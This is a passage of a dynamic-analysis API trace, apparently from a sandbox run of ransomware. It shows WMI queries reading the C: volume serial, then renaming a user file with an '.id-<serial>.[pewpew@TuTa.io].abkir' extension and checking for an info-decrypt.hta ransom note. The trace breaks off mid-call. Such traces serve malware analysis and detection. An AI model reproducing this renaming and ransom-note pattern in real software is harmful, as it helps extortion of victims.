[0159.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9e0 | out: ppvObject=0x949d9e0*=0xbb5848) returned 0x0 [0159.127] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5848, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d9e8 | out: pCid=0x949d9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0159.127] WbemDefPath:IUnknown:Release (This=0xbb5848) returned 0x3 [0159.127] CoGetContextToken (in: pToken=0x949da40 | out: pToken=0x949da40) returned 0x0 [0159.127] CoGetContextToken (in: pToken=0x949de48 | out: pToken=0x949de48) returned 0x0 [0159.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949ded8 | out: ppvObject=0x949ded8*=0x0) returned 0x80004002 [0159.127] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x2 [0159.127] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x1 [0159.127] CoGetContextToken (in: pToken=0x949e7d0 | out: pToken=0x949e7d0) returned 0x0 [0159.127] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0159.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x949e800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e7fc | out: ppvObject=0x949e7fc*=0x6030630) returned 0x0 [0159.127] WbemDefPath:IUnknown:AddRef (This=0x6030630) returned 0x3 [0159.128] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x2 [0159.128] WbemDefPath:IWbemPath:SetText (This=0x6030630, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0159.128] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x949e980 | out: puCount=0x949e980*=0x2) returned 0x0 [0159.128] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x949e97c*=0x0, pszText=0x0 | out: puBuffLength=0x949e97c*=0xf, pszText=0x0) returned 0x0 [0159.128] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x949e97c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e97c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0159.128] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e980 | out: ppv=0x949e980*=0xb51e34) returned 0x0 [0159.128] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e978 | out: pAptType=0x949e978*=1) returned 0x0 [0159.128] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e97c | out: ppvObject=0x949e97c*=0x0) returned 0x80004002 [0159.128] IUnknown:Release (This=0xb51e34) returned 0x1 [0159.128] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5a0 | out: ppv=0x949e5a0*=0x601f480) returned 0x0 [0159.128] WbemLocator:IUnknown:QueryInterface (in: This=0x601f480, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e7b8 | out: ppvObject=0x949e7b8*=0x0) returned 0x80004002 [0159.128] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f480, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7cc | out: ppvObject=0x949e7cc*=0x6024c30) returned 0x0 [0159.129] WbemLocator:IUnknown:Release (This=0x601f480) returned 0x0 [0159.129] WbemLocator:IUnknown:QueryInterface (in: This=0x6024c30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0x6024c30) returned 0x0 [0159.129] WbemLocator:IUnknown:QueryInterface (in: This=0x6024c30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3a8 | out: ppvObject=0x949e3a8*=0x0) returned 0x80004002 [0159.129] WbemLocator:IUnknown:AddRef (This=0x6024c30) returned 0x3 [0159.129] WbemLocator:IUnknown:QueryInterface (in: This=0x6024c30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0159.129] WbemLocator:IUnknown:QueryInterface (in: This=0x6024c30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dcb4 | out: ppvObject=0x949dcb4*=0x0) returned 0x80004002 [0159.129] WbemLocator:IUnknown:QueryInterface (in: This=0x6024c30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dcc0 | out: ppvObject=0x949dcc0*=0x0) returned 0x80004002 [0159.129] CoGetContextToken (in: pToken=0x949dd20 | out: pToken=0x949dd20) returned 0x0 [0159.129] CoGetContextToken (in: pToken=0x949e128 | out: pToken=0x949e128) returned 0x0 [0159.129] WbemLocator:IUnknown:QueryInterface (in: This=0x6024c30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1b8 | out: ppvObject=0x949e1b8*=0x0) returned 0x80004002 [0159.129] WbemLocator:IUnknown:Release (This=0x6024c30) returned 0x2 [0159.129] WbemLocator:IUnknown:Release (This=0x6024c30) returned 0x1 [0159.129] CoGetContextToken (in: pToken=0x949e798 | out: pToken=0x949e798) returned 0x0 [0159.129] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0159.129] WbemLocator:IUnknown:QueryInterface (in: This=0x6024c30, riid=0x949e7c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e7c4 | out: ppvObject=0x949e7c4*=0x6024c30) returned 0x0 [0159.129] WbemLocator:IUnknown:AddRef (This=0x6024c30) returned 0x3 [0159.129] WbemLocator:IUnknown:Release (This=0x6024c30) returned 0x2 [0159.129] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x949e95c | out: puCount=0x949e95c*=0x2) returned 0x0 [0159.129] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=8, puBuffLength=0x949e958*=0x0, pszText=0x0 | out: puBuffLength=0x949e958*=0xf, pszText=0x0) returned 0x0 [0159.129] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=8, puBuffLength=0x949e958*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e958*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0159.129] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e834 | out: ppv=0x949e834*=0x6027580) returned 0x0 [0159.129] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027580, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e8c8 | out: ppNamespace=0x949e8c8*=0x6027a84) returned 0x0 [0160.064] WbemLocator:IUnknown:QueryInterface (in: This=0x6027a84, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e764 | out: ppvObject=0x949e764*=0xb5bb84) returned 0x0 [0160.065] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bb84, pProxy=0x6027a84, pAuthnSvc=0x949e7b4, pAuthzSvc=0x949e7b0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac, pImpLevel=0x949e79c, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4 | out: pAuthnSvc=0x949e7b4*=0xa, pAuthzSvc=0x949e7b0*=0x0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac*=0x6, pImpLevel=0x949e79c*=0x2, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4*=0x1) returned 0x0 [0160.065] WbemLocator:IUnknown:Release (This=0xb5bb84) returned 0x1 [0160.065] WbemLocator:IUnknown:QueryInterface (in: This=0x6027a84, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e758 | out: ppvObject=0x949e758*=0xb5bba4) returned 0x0 [0160.065] WbemLocator:IUnknown:QueryInterface (in: This=0x6027a84, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e754 | out: ppvObject=0x949e754*=0xb5bb84) returned 0x0 [0160.065] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bb84, pProxy=0x6027a84, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0160.065] WbemLocator:IUnknown:Release (This=0xb5bb84) returned 0x2 [0160.065] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x1 [0160.065] CoTaskMemFree (pv=0xbd4a68) [0160.065] WbemLocator:IUnknown:Release (This=0x6027580) returned 0x0 [0160.065] WbemLocator:IUnknown:QueryInterface (in: This=0x6027a84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e354 | out: ppvObject=0x949e354*=0xb5bba4) returned 0x0 [0160.065] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e310 | out: ppvObject=0x949e310*=0x0) returned 0x80004002 [0160.067] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e12c | out: ppvObject=0x949e12c*=0x0) returned 0x80004002 [0160.068] WbemLocator:IUnknown:AddRef (This=0xb5bba4) returned 0x3 [0160.068] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0160.069] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc1c | out: ppvObject=0x949dc1c*=0x0) returned 0x80004002 [0160.070] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc28 | out: ppvObject=0x949dc28*=0xb5bb04) returned 0x0 [0160.070] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bb04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc30 | out: pCid=0x949dc30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0160.070] WbemLocator:IUnknown:Release (This=0xb5bb04) returned 0x3 [0160.070] CoGetContextToken (in: pToken=0x949dc88 | out: pToken=0x949dc88) returned 0x0 [0160.070] CoGetContextToken (in: pToken=0x949e090 | out: pToken=0x949e090) returned 0x0 [0160.070] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e120 | out: ppvObject=0x949e120*=0xb5bb8c) returned 0x0 [0160.070] WbemLocator:IRpcOptions:Query (in: This=0xb5bb8c, pPrx=0xb5bba4, dwProperty=2, pdwValue=0x949e148 | out: pdwValue=0x949e148) returned 0x80004002 [0160.070] WbemLocator:IUnknown:Release (This=0xb5bb8c) returned 0x3 [0160.070] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x2 [0160.070] CoGetContextToken (in: pToken=0x949e668 | out: pToken=0x949e668) returned 0x0 [0160.070] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0160.070] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x949e698*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e694 | out: ppvObject=0x949e694*=0x6027a84) returned 0x0 [0160.071] WbemLocator:IUnknown:AddRef (This=0x6027a84) returned 0x4 [0160.071] WbemLocator:IUnknown:Release (This=0x6027a84) returned 0x3 [0160.071] WbemLocator:IUnknown:Release (This=0x6027a84) returned 0x2 [0160.071] SysStringLen (param_1=0x0) returned 0x0 [0160.071] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x949ea2c | out: puCount=0x949ea2c*=0x0) returned 0x0 [0160.071] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x949ea28*=0x0, pszText=0x0 | out: puBuffLength=0x949ea28*=0x20, pszText=0x0) returned 0x0 [0160.071] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x949ea28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0160.071] CoGetContextToken (in: pToken=0x949e698 | out: pToken=0x949e698) returned 0x0 [0160.071] WbemLocator:IUnknown:AddRef (This=0xb5bba4) returned 0x3 [0160.071] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bba4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e52c | out: ppvObject=0x949e52c*=0xb5bba4) returned 0x0 [0160.071] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x3 [0160.071] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x2 [0160.071] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0x20, pszText=0x0) returned 0x0 [0160.071] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x949ea30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0160.071] IWbemServices:GetObject (in: This=0x6027a84, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e9e4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e9e4*=0x6028318, ppCallResult=0x0) returned 0x0 [0161.267] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x949e9e4 | out: puCount=0x949e9e4*=0x2) returned 0x0 [0161.267] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x949e9e0*=0x0, pszText=0x0 | out: puBuffLength=0x949e9e0*=0xf, pszText=0x0) returned 0x0 [0161.267] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x949e9e0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9e0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.267] IWbemClassObject:Get (in: This=0x6028318, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x369ed94*=0, plFlavor=0x369ed98*=0 | out: pVal=0x949e9e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x369ed94*=8, plFlavor=0x369ed98*=0) returned 0x0 [0161.267] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.267] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.267] IWbemClassObject:Get (in: This=0x6028318, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x369ed94*=8, plFlavor=0x369ed98*=0 | out: pVal=0x949e9e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x369ed94*=8, plFlavor=0x369ed98*=0) returned 0x0 [0161.267] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.267] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.268] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", lpFilePart=0x0) returned 0x9d [0161.268] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xc0 [0161.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea48) returned 1 [0161.268] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), fInfoLevelId=0x0, lpFileInformation=0x949eac4 | out: lpFileInformation=0x949eac4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1c092220, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0161.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea44) returned 1 [0161.268] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0161.269] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest", lpFilePart=0x0) returned 0xa6 [0161.269] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta", lpFilePart=0x0) returned 0x96 [0161.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea68) returned 1 [0161.269] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eae4 | out: lpFileInformation=0x949eae4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ba065a0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1ba065a0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1ba065a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0161.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea64) returned 1 [0161.269] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest", lpFilePart=0x0) returned 0xa6 [0161.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab4) returned 1 [0161.269] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), fInfoLevelId=0x0, lpFileInformation=0x369f974 | out: lpFileInformation=0x369f974*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, 